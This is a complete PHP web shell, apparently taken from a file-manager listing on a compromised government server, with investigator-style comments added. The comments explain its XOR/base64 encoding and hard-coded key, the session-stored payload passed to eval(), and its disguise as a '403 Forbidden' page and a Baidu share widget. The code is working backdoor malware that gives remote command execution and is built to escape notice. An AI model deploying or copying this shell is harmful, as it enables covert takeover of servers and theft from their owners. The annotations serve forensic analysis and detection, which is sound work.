|
Server : Apache/2.2.2 (Fedora) System : Linux App1.pathumtani.go.th 2.6.20-1.2320.fc5smp #1 SMP Tue Jun 12 19:40:16 EDT 2007 i686 User : apache ( 48) PHP Version : 5.2.9 Disable Function : NONE Directory : /var/www/html/crontab/ |
Upload File : |
<?php
// Request setup. Each call carries the @ operator, so a failure in any of them emits no warning.
// The session started here is what carries state between requests: the main block below
// reads and writes $_SESSION.
@session_start();
// Removes the script execution time limit for this request.
@set_time_limit(0);
// Turns PHP error reporting off for this request, so errors raised by the code below are not reported.
@error_reporting(0);
/**
 * XORs every byte of $D with a byte of $K and returns the result.
 *
 * The operation is its own inverse: calling it twice with the same key returns the
 * original string, which is why the script uses this one function for both encoding
 * and decoding. It is obfuscation with a repeating key, not encryption.
 *
 * @param string $D Data to transform; modified in place through string offsets and returned.
 * @param string $K Key. Only offsets 0..15 are ever read, so it is expected to be at least
 *                  16 characters long (the key defined in this file is 16 characters).
 * @return string $D after the XOR pass, same length as the input.
 */
function encode($D, $K){
for ($i = 0; $i < strlen($D); $i++) {
// `+` binds tighter than `&`, so the index is ($i + 1) & 15: the key is walked cyclically
// starting at offset 1 (1, 2, ..., 15, 0, 1, ...).
$c = $K[$i + 1 & 15];
$D[$i] = $D[$i] ^ $c;
}
return $D;
}
// Request handler: a two-stage flow keyed on one POST parameter and one session slot.
//   Stage 1 (no payload in the session yet): the decoded POST body is stored in the session
//           if it contains the marker string "getBasicsInfo".
//   Stage 2 (payload present): the stored text is passed to eval(), then run($data) is called
//           and its return value is sent back, XOR-encoded and base64-encoded.
// Review note: the XOR key is hard-coded below, so captured request and response bodies can be
// decoded offline with encode() during an investigation.

// Name of the POST parameter that carries the base64 + XOR encoded request body.
$pass = 'info';
// Session key under which the stage-1 payload is kept.
$payloadName = 'payload';
// 16-character XOR key used by encode() for requests, responses and the stored payload.
$key = 'e9eb46ef49167165';
if (isset($_POST[$pass])) {
// Request body: base64-decode first, then undo the XOR.
$data = encode(base64_decode($_POST[$pass]), $key);
if (isset($_SESSION[$payloadName])) {
// Stage 2. The session value was stored XOR-encoded (see the else branch), so decode it.
$payload = encode($_SESSION[$payloadName], $key);
// If the marker is missing after decoding, encode() is applied again, which restores the
// raw session value (the XOR is self-inverse).
if (strpos($payload, "getBasicsInfo") === false) {
$payload = encode($payload, $key);
}
// Executes the session-held text as PHP. That text came from an earlier POST body, so
// request input reaches eval() with only the fixed XOR key in between.
eval($payload);
// First five hex characters of md5($pass . $key); substituted for "bdsek" below, producing
// a marker of the form "var Re<5 hex chars>_config=" that precedes the encoded result.
$left = substr(md5($pass . $key), 0, 5);
$replacedString = str_replace("bdsek", $left, "var Rebdsek_config=");
// Only the content type is set; no HTTP status code is set anywhere in the visible code.
// NOTE(review): the static "403 Forbidden" HTML after the closing PHP tag is therefore
// presumably served with the server's default status - confirm against access logs.
header('Content-Type: text/html');
// The response is dressed as an ordinary page with a share-button widget. The fixed strings
// in it (title "GetConfigKey", ids "bdshare_js" / "bdshell_js", "uid=6537022",
// "shell_v2.js?cdnversion=") are candidates for file-content or response-body signatures.
echo '<!DOCTYPE html>';
echo '<html lang="en">';
echo '<head>';
echo '<meta charset="UTF-8">';
echo '<title>GetConfigKey</title>';
echo '</head>';
echo '<body>';
echo '<script>';
// Everything from here to the '-->' echo is emitted inside an HTML comment opener.
echo '<!-- Baidu Button BEGIN';
echo '<script type="text/javascript" id="bdshare_js" data="type=slide&img=8&pos=right&uid=6537022" ></script>';
echo '<script type="text/javascript" id="bdshell_js"></script>';
echo '<script type="text/javascript">';
echo $replacedString;
// run() is not defined in this file; presumably it is declared by the payload eval()'d
// above - TODO confirm from a decoded payload. Its return value is XOR-encoded with $key,
// base64-encoded and written out as the value of the marker variable. The @ hides any
// warning from the call.
echo base64_encode(encode(@run($data),$key));
echo ";";
echo 'document.getElementById("bdshell_js").src = "http://google.com/static/js/shell_v2.js?cdnversion=" + Math.ceil(new Date()/3600000);';
echo '</script>';
echo '-->';
echo '</script>';
echo '</body>';
echo '</html>';
} else {
// Stage 1. Nothing is echoed by this branch; the decoded body is kept only when it contains
// the marker, and it is stored XOR-encoded rather than in clear text.
if (strpos($data, "getBasicsInfo") !== false) {
$_SESSION[$payloadName] = encode($data, $key);
}
}
}
?>
<html><head>
<title>403 Forbidden</title>
</head><body>
<h1>Forbidden</h1>
<p>You don't have permission to access thgs resource.</p>
</body></html>